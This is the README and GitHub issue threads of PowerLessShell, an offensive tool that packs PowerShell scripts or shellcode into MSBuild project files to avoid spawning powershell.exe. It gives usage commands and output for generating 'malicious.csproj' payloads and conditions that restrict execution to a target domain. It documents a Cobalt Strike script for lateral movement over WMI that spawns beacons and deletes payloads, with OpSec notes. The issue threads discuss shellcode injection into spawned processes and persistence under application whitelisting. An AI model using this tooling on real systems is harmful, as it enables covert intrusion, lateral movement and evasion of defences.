Run PowerShell command without invoking powershell.exe



PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.

MSBuild conditions

MSBuild support condition that can be used to avoid running code if the condition is not met.

<Target Name="x" Condition="'$(USERDOMAIN)'=='RingZer0'">

The malicious code will only be executed if the current user domain is "RingZer0"

Condition supports several other formats that can be used to create more conditional execution check.

<Target Name="x" Condition="'$(registry:HKEY_LOCAL_MACHINE\blah@blah)'>='0'">

Property Functions also expose interesting data.


PowerLessShell use commandline argument to generate the final file.

$ python -h
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
usage: [-h] [-type TYPE] -source SOURCE -output OUTPUT
                         [-arch ARCH] [-condition CONDITION]

optional arguments:
  -h, --help            show this help message and exit
  -type TYPE            Payload type (shellcode/powershell) default to:
  -source SOURCE        Path to the source file (raw shellcode or powershell
  -output OUTPUT        MSBuild output filename
  -arch ARCH            Shellcode architecture (32/64) default to: 32
  -condition CONDITION  XML Compiling condition default (Check for USERDOMAIN)
                        default is: none

Generating a powershell payload

$ python -type powershell -source script.ps1 -output malicious.csproj
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
Generating the msbuild file using include/template-powershell.csproj as the template
File 'malicious.csproj' created
Process completed

Generating a shellcode payload

$ python -source shellcode.raw -output malicious.csproj
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
Generating the msbuild file using include/template-shellcode.csproj as the template
File 'malicious.csproj' created
Process completed

Generating a 64 bits shellcode payload

$ python -source shellcode64.raw -output malicious.csproj -arch 64
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
Generating the msbuild file using include/template-shellcode.csproj as the template
Generating a payload for a 64 bits shellcode! Don't forget to use the 64 bits version of msbuild.exe
File 'malicious.csproj' created
Process completed

Cobalt Strike Aggressor script (wmi_msbuild.cna)

By Alyssa (ramen0x3f) and MrT-F

Set Up

  • Either copy PowerLessShell folder to [cobalts working dir]/PowerLessShell or make note of path
  • If you didn't copy it to the Cobalt directory: edit the $pls_path variable in this file to point to PowerLessShell
  • Load script into Cobalt Strike


check_msbuild -target TARGET   		Verify .NET 4.0.30319 is installed (should see "Status OK")
	[-user user] [-pass pass]		Windows 7 has .NET 4.0.30319 after 3 reboots and 4 Windows update cycles

rename_msbuild -target TARGET 		Copy MSBuild.exe. 
	-msbuild newname 
 	[-path C:\new\path] 		Default - C:\Users\Public\
	[-user domain\username]		Specifying user/pass spawns cmd on remote host.
 	[-pass password]			

wmi_msbuild -target TARGET 		 	Spawn new beacon. 
         -listener LISTENER
	[-payload new_file]		 	Default - [a-zA-Z].tmp
	[-directory new_dir]			Default - C:\Users\Public\
	[-msbuild alt_msbuild_location] 	
	[-user USERNAME] [-pass PASSWORD]	
	[-manualdelete]				Switch doesn't auto delete payload.

OpSec Notes

Spawns cmd.exe on the target system if

  • ManualDelete switch is not set
  • rename_msbuild is run with a username/password specified


Mr.Un1k0d3r RingZer0 Team 2017

  • Cobaltstrike CNA issue

    Cobaltstrike CNA issue

    Awesome stuff. I love the Cobaltstrike integration. I ran into a problem however when laterally moving to a host I have local admin on. The randomly generated project file does get uploaded, but the MSBuild.exe command execution doesn't seem to occur. The wmi cmd.exe call doesn't appear to execute.

    -I used the following syntax: beacon> wmi_build target ListenerName

    Things I validated: -wmi_msbuild.cna is in cobalstrike directory -PowerLessShell git clone is in subdirectory of cobaltstrike directory -When I execute the "MSBUILD.exe XxXxx.TMP" manually on the target the it runs like a champ. Just not with the cobaltstrike beacon alias integration with the .cna provided.


    Please advise -bSpence7337

    opened by bspence7337 3
  • Update wmi_msbuild.cna

    Update wmi_msbuild.cna


    • check_msbuild and rename_msbuild functions.
    • wmi_msbuild can now auto-delete payloads.
    • user/pass options (that work without having to make_token)
    • named arguments/parameters
    • lots of probably unnecessary comments
    opened by ramen0x3f 1
  • add template for shellcode execution in remote (spawned) process

    add template for shellcode execution in remote (spawned) process

    Signed-off-by: tothi [email protected]

    spawn process and inject shellcode with: CreateProcess (CREATE_SUSPENDED) + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread.

    msbuild console window only pops up for <1sec.

    useful e.g. for user-level persistence if there is strong application whitelisting enabled and msbuild.exe bypass is working.

    opened by tothi 0
  • Fixed cmd file issues

    Fixed cmd file issues

    The generated .cmd file isn't guaranteed to be allowed to exit cleanly, hence the last few commands which deleted the generated files weren't run. This caused a problem for certutil which would then error and blow everything up. Because it was all in the same line this made the payload stop working. I dealt with this issue by:

    • The first echo command uses a single ">" instead of ">>" so the first file doesn't grow huge in case some delete command doesn't work.
    • Added a check to the .bat file for write access to the msbuild directory, the script will switch to %temp% as a workdir if there is no access, and skips msbuild renaming
    • If the decoded hex payload already exists, just run it instead of decoding everything again (this happens when scheduled tasks expire or get killed)
    • Used \r\n at the end of each line because errors were causing the whole thing to stop with ' && ' between commands and making it way harder to debug

    I also added a schtasks xml output to /examples for an example task that works well on my test system.

    Oh and some stuff you might not like:

    • I got tired of typing in "shellcode" so I switched to that to "s" (and "p" for powershell).
    • Switched to print from Python 3
    opened by blark 0
  • Users may not always have write permissions to C:\Windows\Microsoft.NET\Framework\v4.0.30319\

    Users may not always have write permissions to C:\Windows\Microsoft.NET\Framework\v4.0.30319\

    As stated above, users may not always have write permissions to C:\Windows\Microsoft.NET\Framework\v4.0.30319, so I am requesting a feature to specify either User %APPDATA% or a user provided path to drop the temp files the *.cmd / *.bat create.

    If I have some time, I could create a PR with this feature.

    opened by khr0x40sh 0
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